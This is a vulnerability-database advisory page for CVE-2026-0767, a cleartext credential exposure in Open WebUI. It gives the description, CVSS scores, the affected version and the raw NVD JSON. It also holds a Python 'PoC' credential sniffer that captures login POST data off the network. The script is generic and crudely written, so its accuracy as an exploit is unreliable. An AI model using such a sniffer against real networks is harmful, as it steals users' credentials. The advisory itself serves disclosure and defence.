Security Vulnerability Report
中文
CVE-2026-0767 CVSS 6.5 MEDIUM

CVE-2026-0767

Published: 2026-01-23 04:16:04
Last Modified: 2026-01-30 19:37:00
Source: [email protected]

Description

Open WebUI Cleartext Transmission of Credentials Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Open WebUI. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of credentials provided to the endpoint. The issue results from transmitting sensitive information in plaintext. An attacker can leverage this vulnerability to disclose transmitted credentials, leading to further compromise. Was ZDI-CAN-28259.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:openwebui:open_webui:0.6.32:*:*:*:*:*:*:* - VULNERABLE
Open WebUI 所有未修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0767 PoC - Open WebUI Cleartext Credentials Capture # This PoC demonstrates the vulnerability where credentials are transmitted in plaintext import socket import struct import argparse def capture_http_credentials(interface, port=3000): """ Capture plaintext credentials from Open WebUI HTTP traffic This PoC is for educational and authorized testing purposes only """ print(f"[*] Listening on {interface}:{port} for HTTP traffic...") print("[*] Waiting for credentials from Open WebUI login endpoint...") # Create raw socket to capture HTTP traffic try: sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP) sock.bind((interface, port)) except PermissionError: print("[-] Root privileges required for raw socket") return while True: try: data, addr = sock.recvfrom(65535) # Parse HTTP packet and look for login credentials http_data = data.decode('utf-8', errors='ignore') # Check for typical Open WebUI login patterns if 'POST' in http_data and ('username' in http_data.lower() or 'password' in http_data.lower()): print("[+] Potential credentials captured!") print(http_data) # Extract credentials if present if 'username=' in http_data.lower() and 'password=' in http_data.lower(): print("\n[+] Cleartext credentials found!") except KeyboardInterrupt: print("\n[*] Stopping capture...") break def main(): parser = argparse.ArgumentParser(description='CVE-2026-0767 PoC') parser.add_argument('--interface', default='0.0.0.0', help='Network interface to listen on') parser.add_argument('--port', type=int, default=3000, help='Port to monitor') args = parser.parse_args() capture_http_credentials(args.interface, args.port) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0767", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:03.660", "lastModified": "2026-01-30T19:36:59.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI Cleartext Transmission of Credentials Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Open WebUI. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of credentials provided to the endpoint. The issue results from transmitting sensitive information in plaintext. An attacker can leverage this vulnerability to disclose transmitted credentials, leading to further compromise. Was ZDI-CAN-28259."}, {"lang": "es", "value": "Vulnerabilidad de revelación de información por transmisión de credenciales en texto claro en Open WebUI. Esta vulnerabilidad permite a atacantes adyacentes a la red revelar información sensible en instalaciones afectadas de Open WebUI. La autenticación no es necesaria para explotar esta vulnerabilidad.\n\nLa falla específica reside en el manejo de las credenciales proporcionadas al endpoint. El problema se debe a la transmisión de información sensible en texto claro. Un atacante puede aprovechar esta vulnerabilidad para revelar credenciales transmitidas, lo que lleva a un mayor compromiso. Fue ZDI-CAN-28259."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openwebui:open_webui:0.6.32:*:*:*:*:*:*:*", "matchCriteriaId": "2B5D5634-470E-499C-A7C3-A5FD7277D287"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-033/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.